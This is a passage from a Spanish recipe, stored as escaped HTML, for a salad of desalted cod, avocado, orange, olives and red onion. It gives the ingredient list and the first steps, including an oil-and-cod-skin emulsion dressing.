Una ensalada que va a mover tus sentimientos.<\/p><\/blockquote>\n<p>[one_third]<strong>Ingredientes<\/strong><\/p>\n<p>150 g lomo de bacalao desalado<\/p>\n<p>1 aguacate<\/p>\n<p>3 naranjas<\/p>\n<p>12 aceitunas de arag\u00f3n<\/p>\n<p>1 cebolla roja<\/p>\n<p>sal<\/p>\n<p>100 ml aceite de oliva virgen[\/one_third][two_third_last]<strong>Elaboraci\u00f3n<\/strong><\/p>\n<p>Desmenuza el bacalao con las manos y reserva la piel. Corta la cebolla fina y d\u00e9jala remojada en agua con vinagre para que pierda picor.<\/p>\n<p>Pon la piel en un cazo con el aceite de oliva a fuego lento. Cuando empiece a soltar la gelatina y se empiece a ligar la salsa, agrega el zumo de una naranja. Reserva esta preparaci\u00f3n para ali\u00f1ar.<\/p>\n<p>Pela el resto de naranjas y c\u00f3rtalas en octavos o gajos limpios.
